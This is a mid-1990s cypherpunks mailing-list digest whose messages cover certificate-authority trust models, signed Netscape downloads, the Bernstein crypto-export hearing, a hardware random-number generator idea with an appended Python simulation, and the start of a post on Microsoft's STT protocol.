MIME-Version: 1.0
Content-Type: text/plain


At 7:15 PM 10/3/95, Carl Ellison wrote:

>Yup.  Verisign is probably going to fight hard to keep their certificate
>model.  On top of them, there's the US Postal Service and a few others,
>fighting over the chance to set up a certificate hierarchy.

Almost needless to say, there is nothing particularly wrong with
certificate-granting agencies. A big caveat: Providing the process is fully
voluntary.

(I'm not addressing issues of implementation, of the "X.509" messinesses, etc.)

The big danger I see in all this talk of "certificate authorities" is that
it won't be a voluntary process. (The same themes as with key escrow.)

I'm not suggesting we waste our time arguing against such certificate
authorities. Rather, we might better spend our time finding ways to
monkeywrench the proposals.

I don't want either the "Postal Service" or "Verisign" given the authority
to approve or disapprove my identity or any identity I may choose to adopt.

Isn't it about time for SAIC to acquire Verisign?

--Tim May (Identity Subject to Approval)



---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Tue, 3 Oct 95 14:07:15 PDT
To: Laurent Demailly <jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape's dependence upon RSA down for the count!)
In-Reply-To: <9510030147.AA15570@dmsd.com>
Message-ID: <9510031403.ZM151@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


On Oct 3,  6:19pm, Laurent Demailly wrote:
> Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was R
> 
> [ text/plain
>   Encoded with "quoted-printable" ] :
> Jeff Weinstein writes:
>  > In article <9510030248.AA08909@hplyot.obspm.fr>, dl@hplyot.obspm.fr
>  > (Laurent Demailly) writes:
>  > > I asked months ago netscape folks to make md5sum and/or PGP digital
>  > > signatures (preferably md5sum of each file, this in a file, itself
>  > > pgp signed) of the binaries available on their page and on relevant 
>  > > newsgroup to reduce possibility of tampering.
> [...]
>  >   I've been thinking about this recently for obvious reasons.  My concern
>  > is that if someone can attack your download of netscape, they could also
>  > attack your download of the program that validates netscape.  Is there
>  > really any way out of this one?
> I have *already* downloaded, checked,... pgp years ago, and I did
> multiplatforms cross tests,... so all I need is a pgp signed stuff
> (obviously i need your (netscape's) pgp public key too, but I think
> that a "massive" distribution, that is : mail on a couple of mailing
> lists, your site, newsgroup, eventually adding fingerprint by phone
> for the paranoid, would ensure that your key is indeed your key (it
> can probably take few weeks before it's "sure" (you'll get feedback if
> key has been tampered with somehow) 
> Or easiest even manage that your key is signed by some well known folk
> (PhilZ,...))
> 
> See my point ?

  Yes, I get the idea about spewing the signed hashes everywhere.  The
problem I have is with the user of PGP.  That will help cypherpunks,
but does absolutely nothing for most of our millions of users, who
have no idea what PGP is.  Perhaps it's enough to assume that if anyone
is tampering with the distribution, some cypherpunk will stumble across
it...

	--Jeff


-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Olivier GALIBERT <Olivier.Galibert@mines.u-nancy.fr>
Date: Tue, 3 Oct 95 06:20:28 PDT
To: akjoele@ee.siue.edu (Arve Kjoelen)
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510031259.HAA01229@shiva.ee.siue.edu>
Message-ID: <199510031312.OAA18079@mines.u-nancy.fr>
MIME-Version: 1.0
Content-Type: text/plain


> 
> It doesn't crash Solaris 2.4 running X11R5 (Netscape 1.1N)
> 
> > I need help testing this bug on other platforms. I have created
> > a test page. Go to http://www.gl.umbc.edu/~rcromw1/crash.html
> > to test.

It doesn't crash on SunOS 4.1.3_U1/NCD X Terminal either, but the
way the "Mail To" field is written is funny (three lines of x's
on the same horizontal line with 2pix horz. spacing :-).

  Sarayan



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Tue, 3 Oct 95 12:24:19 PDT
To: stewarts@ix.netcom.com
Subject: Re: X.509, S/MIME, and evolution of PGP
In-Reply-To: <199510031837.LAA27564@ix2.ix.netcom.com>
Message-ID: <9510031915.AA13386@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Tue, 03 Oct 1995 11:37:22 -0700
>From: Bill Stewart <stewarts@ix.netcom.com>

>At 10:24 AM 10/3/95 EDT, Carl Ellison <cme@TIS.COM> wrote:
>>I hear you but I object.
>>Going along with the majority may be the fastest way to get a result out
>>but it's morally wrong.
>
>A zillion and a half people are about to get the next version of Netscape,
>which uses X.509 certificates, and they can get free Verisign persona
>certificates to go with them; stores can get inexpensive ones.
>They will use this for secure email, like it or not,
>and as they discover the need for better certification (when there's
>money involved), they'll go get it.  Wherever they can.

Yup.  Verisign is probably going to fight hard to keep their certificate
model.  On top of them, there's the US Postal Service and a few others,
fighting over the chance to set up a certificate hierarchy.

The whole world is thinking of physical people and of tying things to those
people.  They think of names as the only handle on (pointer to) people.
...so they see certificates as right and proper.  We need to show them a
better way.  (Tie attributes through the key to the person -- not through
the person to the key.)

>The question is, will they get a Web of Trust model from us,
>or will they stick to the hierarchical model?  

As several have pointed out, a certificate structure (X.509, PGP or mine)
can be used in a hierarchy, if you want it, or not if you don't.  We don't
care.  What I care about is that a signed thing (one link in a chain of
assertions) speak directly to what it is signing ("this key is good for
_________") or ("the person who demonstrated to me that he knew the private
key for this key has red hair and wore glasses") -- rather than try to
sidle up to existing people structures (by tying to names of people) and
then, on discovering that the people-structures aren't as strong as the
digital signatures, make the people structures stronger (e.g., by unique ID
number on a national ID card, with thumbprints for verification).

>						If we get something
>halfway decent out there, fast enough, ideally with support
>or toleration from Netscape, people will at least have distributed trust
>models in their worldview, and will insist that the tools they use and
>build around it be compatible.  Otherwise, almost all of them _will_ be
>using the hierarchical-only structure, and the next big Internet application
>that needs security will latch onto the now-big software base, and may not
>be as decent as Netscape about the trust models they accept.

Yes -- I agree.  We should get cracking on this.

>If you can define a better relational trust model than the Web stuff,
>fast enough to avoid this, great!  Go for it.  But it'll be much easier
>to get something like that adopted in a non-hierarchical world than in
>a world of Drivers' Licenses on the Information Superhypeway. 

I'm still talking web of trust -- only I'm removing the person's name (or
e-mail address) as a link between the assertion and the key.

Haven't I described this well enough?  Do I need to write it up in more
detail?


How about some analogies?

I could have a driver's license (giving my name and address), a piece of
paper saying that I (at my address) own bank account number 01732 at First
Security Bank, and a certificate from Verisign also giving my name and
address.  This ties my public key to my driver's license (assuming I'm the
only Carl Ellison at my address (which I wasn't, as a kid) and that I don't
move).

Alternatively, I can have First Security Bank open account 01732 for me and
create a certificate binding my public key to that account number.  Now, I
can use that key to sign anonymous checks.  (The bank knows me, perhaps,
but the payee doesn't need to.)  To tie my name to the public key, I sign
my own certificate saying ``The person who knows the private key for
61E2DE7FCB9D7984E9C8048BA63221A2 goes by the name "Carl Ellison" and
receives mail at "cme@acm.org".''  I don't need anyone else to attest to
the validity of that statement because it's uni-directional (from key to my
name), not the other way.  It's only the other assertion direction which
requires some witnesses to attest to validity, because the name is not
capable of doing a digital signature without a key.  [That is, if you were
to go the other direction (which is what X.509 or PGP try to do), you need
to sign a key with a name (DN or UserID).  You can't sign with a DN or
UserID.  You can sign with a key.  So, you have to fall back on human
witnesses to use their keys to sign in place of the name (DN or UserID) and
you have to decide how to trust those witnesses.  If you reverse the arrow
of assertion, this particular problem goes away.]

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHGLpVQXJENzYr45AQFS2QQAidMwZMBbv2ap2S4ZNVIWfZO6/W1FHOaw
GZYHQk38o0qD5YOrth1Hab2IiyuvLtBG38hHJ8aZf3NsvzswSvNExuBQy+eLns8m
ZcM2B4qPMRWOP1XMmAPaoaknRTmonKP/acO4KcKIR0K+x+n1DNwTwyDx4LbRjOnn
hHp3fFfD7iI=
=Fccl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Tue, 3 Oct 95 12:44:41 PDT
To: stewarts@ix.netcom.com
Subject: Re: Certificate proposal
In-Reply-To: <199510031838.LAA27571@ix2.ix.netcom.com>
Message-ID: <9510031923.AA14118@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Tue, 03 Oct 1995 11:37:26 -0700
>From: Bill Stewart <stewarts@ix.netcom.com>

>However, it's _very_ tough to spoof a credit-card verification system, 
>because the checkout device uses phones or private networks to reach the 
>authorization company, so the response that comes back saying yes/no/stolen
>can be real dumb.  On the internet, the response needs to be signed,
>though I suppose it could say "Key sssss at xxx@yyy.zzz authorized
>key uuuuu today yyyy/mm/dd/hh:mm:ss, valid for up to $500", and you'd then have
>to validate the key that signed it, etc....  On the other hand, you could
>have the cert require multiple confirmations, e.g. both the bank and the
>user have to authorize this use.

The response does *not* need to be signed.  If you want rock solid
authentication which you can save for later use in court (e.g., buying an
airplane?), you might insist on a digital signature.  However, all you need
is for the path from the person who knows (AmEx's computer) to your cash
register to be trusted.  There are lots of ways to establish trust.

E.g., you could encrypt the path with a session key (triple-DES) chosen by
the cash register and sent at the beginning of the day to AmEx using AmEx's
public key.  Now anything coming back under that symmetric key is
effectively authenticated.

>>>3) Neither PGP nor X.509 (as documented in the RFC1422 and PKCS#6) have any
>>>	   mechanism for additional information other than cramming it into
>>>	   the username, but supposedly X.509 Version 3 includes something?
>>Yup -- and it's ugly.  It counts on a defined OBJECT ID to define the
>
>OBJECT IDs solve two problems - one is that you need some kind of format (yuk),
>but the other is that fields need to have mutually agreed on values to be meaningful,
>and central registration is an easy way to implement it, as long as there's
>a simple way to register things.  I hope it at least supports an OBJECTID
>with parameters, e.g. "CreditLimitUSDollarsBankFoo integer"  rather than needing
>excessively many OBJECTIDs "CreditLimit3700USDollarsBankFoo"?  As you say below,
>there's certainly no need to use ASN.1 formats instead of readable ones...

OBJECT IDs are by no means even a sensible way to achieve this end.  SMTP's
tags work very nicely, thank you, and they allow people to define their own
for private-joke extensions to the protocol.  (I did just that for e-mail
access to the TIS DRC.)

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHGNYlQXJENzYr45AQH8AgQArY71q84bEuPsVRa4Po5ZcHLMoV7yFszX
tZBqokbZ0F9ZFh7USHyynlx/J82yzBRdks680p5j6lXbQ4wbr5xSZQNDEzS+FVNq
+IObzc+c1qv1nSvb6gcJP6wRNfEMk64bSqprG8sYcN2edD5ksDHFECOGCdxnN4Iy
TWT/rpwOYr0=
=UsEv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 3 Oct 95 07:53:59 PDT
To: cypherpunks@toad.com
Subject: Re: economic espionage (@#$%^&*) (fwd)
Message-ID: <199510031453.PAA12535@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



NY Times, Oct 3, 1995, Business Employment Ad.


1984 Sarajevo, Olympics; 1995 Sarajevo, Battleground


Every day in our world, new threats, new challenges, new
missions emerge. The people of the Central Intelligence
Agency are dedicated to meeting the missions of the day,
providing information and resources that aid decision
makers in solving the problems and responding to issues
that affect us all.

You can play an integral role in our mission, while
advancing your own career.

The Central Intelligence Agency is currently seeking
professional men and women who will be comfortable living
and working abroad. These positions entail extended
overseas assignments in various parts of the world.
Previous service in long-term foreign assignments, in
either business or government positions, is a definite
advantage.

Changing international economic, political and social
conditions make a broad range of professional backgrounds
suitable for these positions. Your experience may be in
economics, finance, marketing, or general business.
Scientific or technical experience in engineering
disciplines, physical sciences, biological sciences, or
any area of high technology research and development is
of particular interest.

These overseas positions require more than appropriate
professional experience. Successful candidates must also
demonstrate a high degree of individual initiative, self
reliance and personal integrity. Naturally, the ability
to speak or learn a foreign language is expected along
with above average communications skills, both oral and
written. A Bachelor's degree is a minimum requirement.
Advanced degree or military service is a plus.

All applicants must successfully complete a thorough
medical and psychiatric exam, a polygraph interview, and
an extensive background investigation. U.S. citizenship,
or eligibility for citizenship, is required. CIA
encourages applications from men and women of every
racial and ethnic background from all parts of the nation
-- we represent America and we want to be representative
of America.

We will respond within 30 days if your application is
evaluated as being of interest.

Central Intelligence Agency
Dept. 15FS
P.O. Box 12002
Arlington, VA 22209-8727
Fax: 703-482-7395

CIA is an equal opportunity employer

[CIA eagle-headed all-points shield logo]

[Motto] Meet the Challenge of a Changing World

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Mon, 2 Oct 95 23:12:37 PDT
To: cypherpunks@toad.com
Subject: Re: `Hack Microsoft' challenge is NYT Computer News Daily's top story
In-Reply-To: <199510030306.XAA24030@thor.cs.umass.edu>
Message-ID: <199510030504.AA51368@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>> I don't know about everyone else, but a T-shirt seems a very 
>> small reward for uncovering a "hole" in the encryption 
>> algorithm of Microsoft products.  
>
>I don't know about anyone else, but helping to protect the confidential data 
>of millions of users around the world seems a very large reward for
>uncovering a hole in the encryption algorithms of M$ products.

My reward would be the satisfaction of showing M$ code to be the substandard,
elitist, money grubbing and dictatorial junk it is. The size of their payroll
should not be the reason they want to be able to dictate what programs Joe
Deskset runs on the internet.

I can see the progression where their CC transportation software is coupled
with a Registration Wizard to automatically purchase any software on your HD
that they have no record of you purchasing... "just in case and as a service
on your behalf".

Mark
The above opinions are rumoured to be my own.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Tue, 3 Oct 95 16:30:34 PDT
To: cypherpunks-announce@toad.com, gnu
Subject: Oct 20th SF C'punks meeting: at the ITAR Constitutional trial court
Message-ID: <9510032330.AA11251@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


We're having a "Cypherpunks Dress-Up Day" on Friday, October 20th.
Meet at the Federal Building in San Francisco, 450 Golden Gate Avenue,
at 10:15AM.  Hey, I've seen Tim May in a suit once, why not again?

The first "oral arguments" in the Bernstein crypto export case will
happen there, starting at 10:30, in Judge Patel's courtroom upstairs.
We've been fedexing legalese back and forth for months; now we get to
explain the case in person.  You can meet our intrepid lawyers, who
are slaving away without pay, in durance vile, to protect our rights!
Shake hands with an NSA lawyer specially flown in for the occasion!
Meet some local journalists!  And watch the wheels of justice grindin'
as the judge first explores our case.  We will follow the hearing with
a group lunch at Max's Opera Plaza, a block away, and break up at
12:30 or 1PM.

In this case, Dan Bernstein, ex-grad-student from UC Berkeley, is
suing the State Department, NSA, and other agencies, with help from
the EFF.  Our main argument is that the export controls on crypto
software are a "prior restraint on publication" which is
unconstitutional under the First Amendment unless handled very
delicately by a court (not just by an agency acting on its own).
These agencies restrained Dan's ability to publish a paper, as well as
source code, for the crypto algorithm that he invented.  There are
additional arguments along the lines that the State Department and NSA
take a lot more liberties during the export process than their own
regulations and laws really permit.  Full background and details on
the case are in the EFF Web/FTP archives at:
    http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case.

Like Phil Karn's case, this lawsuit really has the potential to outlaw
the whole NSA crypto export scam.  We could make your right to publish
and export crypto software as well-protected by the courts as your
right to publish and export books.  Of course, the government would
appeal any such decision, and it will take years and probably an
eventual Supreme Court decision to make it stick.  But you can be
there at the very beginning!

Please make a positive impression on the judge.  Show her -- by
showing up -- that this case matters to more people than just the
plaintiff and defendant.  That how it gets decided will make a
difference to society.  That the public and the press are watching,
and really do care that it gets handled well.  We'll have to be quiet
and orderly while we're in the courthouse.  There will be no questions
from the audience (that's us), but the session will be tape-recorded,
and you can take notes if you like.

The judge is Marilyn Hall Patel, who used to be on the board of
directors of the ACLU.  I haven't met her, but I hear that she's not
afraid to tell the government where to stuff it, when they deserve it.
Our lawyers met with her once before, but this will be your first
chance to meet the judge in person.

The particular issue in front of the judge on the 20th is whether the
case should be thrown out.  The government is arguing that it should.
It's a mess of legal details about whether the Judicial Branch has the
right to decide questions like this, and over whether we have really
properly claimed a Constitutional rights violation.  It will teach
most c'punks something about how the courts work, and how the NSA and
State Dept use bureaucratic tricks to avoid facing the real issues.
We have managed to drag in some of these issues, like whether there is
sufficient "expression" in software that the First Amendment should
protect publishers of software.  It's possible, but unlikely, that the
judge will decide then-and-there.  We will get some clues to how
she is leaning, based on her questions and comments.  Her written
decision will come out some days or weeks later.

Don't bring any interesting devices unless you're willing to check
them with the lobby guards for the duration.  They seem to want to
hold onto guns, "munitions", and even small pocketknives, before
they'll let you go upstairs to the courtrooms.

So, here's your excuse to put on a nice costume, take an early lunch,
and pay a call on the inner sanctum of our civil rights.  See you there!

	John Gilmore




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 3 Oct 95 13:33:03 PDT
To: cypherpunks@toad.com
Subject: (fwd) ETO TENDER
Message-ID: <v02120d04ac974634ca5d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Tue, 3 Oct 95 09:14:04 -0400
From: "GORD JENKINS" <jenkins@fox.nstn.ca>
X-Minuet-Version: Minuet1.0_Beta_14.1
Reply-To: <JENKINS@fox.nstn.ca>
X-Popmail-Charset: English
To: www-buyinfo@allegra.att.com, untpdc@urgento.gse.rmit.EDU.AU
Subject: ETO TENDER

For List:

Ref UN Trade Point
------------------
Attached is an alternative to the use of electronic brokers who
charge per transaction. This service is free and very well organized.

Check out the UNCTAD Trade Point Web site at:
 http://www.unicc.org/untpcd

Gordon Jenkins

Email: jenkins@fox.nstn.ca
URL : http://www.infop.com/karoma

----- Forwarded message begins here -----
From: UNTPDC  <untpdc@urgento.gse.rmit.EDU.AU>
Thu, 28 Sep 1995 11:47:45 +1000 (EST)
To: ETO gateway <etotrade@wtm.com>
Subject: ETO TENDER

TO      :       ETO ASSOCIATES - TRADE POINTS
FROM    :       Carlos Moreira
                Head United Nations Trade Point Development Centre
                UNCTAD

Subject :       ETO Tenders

Dear ETO users,

we are introducing a new service to the ETO systems which relates
to international tenders. The service ETO Tender is also free and
we will disseminate the information via email. The tender data is
always free text so we will not codify the information. Please
send us your national tenders so we can increase the number of
tenders on-line.

With my best regards

Carlos Moreira



ETO TENDER
Japan
FOREIGN GOVERNMENT TENDER

Description:
S16  CONSTRUCTION

Comments:


PRODUCT DATA

A.  INDUSTRY SECTOR CODE:
B.  DETAILED PRODUCT DESCRIPTION:  CONSTRUCTION TITLE:
    PRELIMINARY DESIGN OF THE KOYA JUNCTION BRIDGES; SUMMARY:
    PRELIMINARY DESIGN OF BRIDGES FOR GENERAL AND EXCLUSIVE USE
    AT THE KOYA JUNCTION (TENTATIVE NAME); DELIVERY DATE:  MARCH
    25, 1996.
C.  PRODUCT SPECIFICATIONS/TECHNICAL DATA:  N/A (NOT AVAILABLE)
D.  QUANTITY:  N/A
E.  U.S. DOLLAR VALUE:  N/A
F.  OTHER INFORMATION:  N/A

RESPONSE DATA

A.  RESPONSE LANGUAGE:  JAPANESE.
B.  BEST WAY TO RESPOND:  LETTER.
C.  FROM MANUFACTURERS ONLY:  N/A
D.  INFORMATION DESIRED FROM U.S. FIRM:  N/A
E.  PRIMARY BUYING FACTOR:  N/A
F.  OTHER INFORMATION:  INTERESTED FIRMS MUST SUBMIT THEIR
    EXPRESSION OF INTEREST IN THIS DESIGN COMPETITION BY 17:00
    PM, SEP. 29.  THE PROSPECTUS MUST BE OBTAINED DIRECTLY FROM
    THE PROCURING AGENCY, NOT FROM U.S. EMBASSY.

TENDER LEAD DATA

A.  ISSUING AGENCY:  METROPOLITAN NATIONAL HIGHWAY WORK OFFICE,
    KANTO REGIONAL CONSTRUCTION BUREAU
B.  FINANCING AGENCY:  SAME AS ABOVE.
C.  PRICE OF PROSPECTUS:  N/A
D.  OBTAIN PROSPECTUS BY:  OCT. 23, 1995.
E.  TENDER NUMBER REQUIRED IN ALL COMMUNICATIONS:  N/A
F.  PERFORMANCE BONDS REQUIRED:  N/A
G.  CLOSED PROCUREMENT PROCEDURE:  NO.
H.  BIDDING PROCEDURES:  SELECTIVE TENDER.
I.  PROPOSAL DEADLINE:  17:00 PM, OCT. 24, 1995.
J.  OTHER INFORMATION:  "KENSETSU KOGYO SHIMBUN":  9/19/95.
    CRITERIA FOR QUALIFICATION, SELECTION, AND SCREENING:  1)
    QUALIFICATION CRITERIA FOR PARTICIPANTS:  FIRMS PRE-
    QUALIFIED FOR OPEN COMPETITIVE OR SELECTIVE BIDDING ON CIVIL
    ENGINEERING CONSULTING WORK BY THE KANTO REGIONAL
    CONSTRUCTION BUREAU; 2) SELECTION CRITERIA FOR PARTICIPANTS:
    A) RECORDS OF SAME TYPE OR SIMILAR WORK; B) CONDITIONS OF
    REGISTERED BUSINESS; C) AVAILABILITY OF SPECIALIZED
    ENGINEERS; D) QUALIFICATION, BACKGROUNDS, AND WORK INVOLVED
    OF ASSIGNED ENGINEERS; E) PLAN FOR SUBCONTRACTING; AND F)
    RELATIONS WITH CONTRACTORS; AND 3) SCREENING CRITERIA FOR
    DESIGN PROPOSALS:  A) HISTORY OF COMPANY'S BUSINESS:
    RECORDS OF SAME TYPE OR SIMILAR WORK; AVAILABILITY OF
    SPECIALIZED ENGINEERS; B) EXPERIENCE AND ABILITY OF
    ENGINEERS:  QUALIFICATION, EXPERIENCE, WORK INVOLVED, AND
    WORK RECORDS OF ASSIGNED ENGINEERS; AND C) PLAN OF ACTION
    AND ITS METHOD:  LEVEL OF UNDERSTANDING OF PROSPECTUS;
    APPROPRIATENESS OF PLAN OF ACTION; ADEQUACY, ORIGINALITY,
    AND FEASIBILITY OF PROPOSAL; AND APPROPRIATENESS OF PROCESS
    AND MANPOWER PLAN.

POST REMARKS:


POST CONTACT/PREPARED BY:  HAOMORI
APPROVED BY:  GTAEVS

CONTACT:
          FIRST PLANNING AND DESIGN DIVISION, METROPOLITAN
          NATIONAL HIGHWAY WORK OFFICE, KANTO REGIONAL
          CONSTRUCTION BUREAU, MINISTRY OF CONSTRUCTION, 86
          TAKEGAHANA, MATSUDO-SHI, CHIBA-KEN 271, JAPAN

PHONE:    81/473/62-4115

FAX:      N/A

Please send a copy of your response to:
          COMMERCIAL OFFICER (FCS TOP)
          AMERICAN EMBASSY
          TOKYO
          UNIT 45004
          APO AP 96337

          Refer to TC606
------ Forwarded message ends here ------
 --
 GORD JENKINS
e mail  JENKINS@fox.nstn.ca
tel 613 794 6735
fax 613 723 8938

--- end forwarded text

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Tue, 3 Oct 95 14:31:31 PDT
To: cypherpunks@toad.com
Subject: Keyserver keyrings
Message-ID: <g2ZecD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The public keyrings at MIT and Uni-Hamburg haven't been updated since August.
Does anyone know why?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: LIBERTY!! Use it or lose it!!

iQCVAwUBMHGqnN74r4kaz3mVAQEdjwP8DnOUAYZa4PqtiMprEaRtwnO2d2RvI2KW
jPgeL/99bv/8DwlmbpE2+SYv6AXw4E+MQjPVSbxnpFlH/YuZaGEnJ4mMI6xnvD5X
/vFaGI9B82YJ9aLx2MD8Lqu82dCPhk91ZxriyhPkAwfPhe8DfihPwtWaohTDygx5
Uwcifpl49eY=
=9xkB
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                         jgrubs@left.webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Tue, 3 Oct 95 16:13:31 PDT
To: cypherpunks@toad.com
Subject: About that simple hardware RNG
Message-ID: <951003.173054.7O1.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The idea:  noise from an avalanching diode is applied to the input of an
8 bit shift register.  The SR is clocked at some fairly high sampling
rate.  The 8 bits are made available on the printer port.

The questions: Does the RNG need to accumulate bits, or can it simply
present the most recent 8 random bits from the diode?  (I imagine
there'll have to be a protection against reading again before the SR has
flushed)  How fast can you sample an avalanching diode?  (how many
bits/second can I expect to harvest?)  Would a less-than-quartz-accurate
sampling rate be acceptable?  (555s, resistors and caps are cheaper than
oscillator modules)  Or would a device driver to supply the sampling
frequency be acceptable?  What if someone (Mallet?) hacks the driver?
(the driver is admittedly less portable)

One last question... what aesthetics apply here?  Would cypherpunks
abide a largish box, or shun anything larger than a typical dongle?
(smaller usually equals more expensive)
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org will do just fine, thanks.
          "Does that not fit in with your plans?"
                      -- Mr Wiggen, of Ironside and Malone (Monty Python)
          PGP public key available upon request (send yours)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHHAPRvikii9febJAQHkIgQApvQh/Lc+5lLpVjJy50TDg6CjIETwmS1p
Z+CxMmNiNCRlu8gdbIPiIuT7vrnGaOeuFF4OEzWKzUhokMJ7jNDaRZvgIX8DaNm9
R8+LtCqYmBASHlmq5iHHhFxESwsXCK4ulnWZuMVju4eEF6DNrZqHmSHChr/hQ2L6
df+s+KJ9lWY=
=vosV
-----END PGP SIGNATURE-----
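
A model of the shift-register question in the post above, added here as an illustration and not part of the original message. It assumes the register shifts left with the new bit entering at the low end; the bit stream is constructed from a seeded PRNG standing in for the diode.

```python
import random


class ShiftRegisterRNG:
    """8-bit shift register fed one noise bit per clock (model of the posted idea)."""

    def __init__(self, bit_source):
        self._bits = iter(bit_source)
        self.sr = 0      # value visible on the printer port
        self.fresh = 0   # clocks since the last guarded read, capped at 8

    def clock(self, n=1):
        for _ in range(n):
            self.sr = ((self.sr << 1) | next(self._bits)) & 0xFF
            self.fresh = min(self.fresh + 1, 8)

    def read_unguarded(self):
        # Returns whatever is on the port, even if most bits were already read.
        return self.sr

    def read_guarded(self):
        # The "protection" asked about: refuse until 8 new bits have arrived.
        if self.fresh < 8:
            return None
        self.fresh = 0
        return self.sr


def pack(bits):
    """Pack a list of bits, most significant first, into an integer."""
    value = 0
    for b in bits:
        value = (value << 1) | b
    return value


def unguarded_reads(bits, k, count):
    """Read the port every k clocks (k < 8) without any guard."""
    rng = ShiftRegisterRNG(bits)
    rng.clock(8)
    out = [rng.read_unguarded()]
    for _ in range(count - 1):
        rng.clock(k)
        out.append(rng.read_unguarded())
    return out


def carried_over(prev, cur, k):
    """True if the top 8-k bits of cur are just the low 8-k bits of prev."""
    keep = 8 - k
    return (cur >> k) == (prev & ((1 << keep) - 1))


def guarded_reads(bits, k, count):
    """Poll every k clocks, keeping only reads the guard allows."""
    rng = ShiftRegisterRNG(bits)
    out = []
    while len(out) < count:
        rng.clock(k)
        byte = rng.read_guarded()
        if byte is not None:
            out.append(byte)
    return out


# Constructed sample input: a seeded PRNG stands in for the sampled diode noise.
_prng = random.Random(1995)
SAMPLE_BITS = [_prng.getrandbits(1) for _ in range(512)]

if __name__ == "__main__":
    reads = unguarded_reads(SAMPLE_BITS, 3, 6)
    for prev, cur in zip(reads, reads[1:]):
        print(f"{prev:08b} -> {cur:08b}  repeats old bits: {carried_over(prev, cur, 3)}")
    print("guarded:", [f"{b:08b}" for b in guarded_reads(SAMPLE_BITS, 3, 4)])
```

With a read every 3 clocks, each unguarded byte carries only 3 new bits; the other 5 are predictable from the previous byte.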




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Roos <andrewr@vironix.co.za>
Date: Tue, 3 Oct 95 08:40:03 PDT
To: aba@dcs.ex.ac.uk
Subject: STT Authentication
Message-ID: <9510031738.aa13031@herman.vironix.co.za>
MIME-Version: 1.0
Content-Type: text/plain


Hi All

Ramblings from a disturbed mind...

I've had a look at Microsoft's Secure Transaction Technology (STT) protocol.
The purchase order/authorization/receipt phase is authenticated using the
card holder's credential ("cred", in MS speak). The credential is similar to
a certificate except the binding is between a credit card and a public key,
rather than between an identity and a public key. What interests me is the
procedure for issuing cred's to cardholders. If I'm reading the spec right,
this is done in response to a "Cardholder Credential Request" message which
includes card details and the public keys to be associated with the card.
This data, along with a SHA hash of the data, is encrypted and sent to the
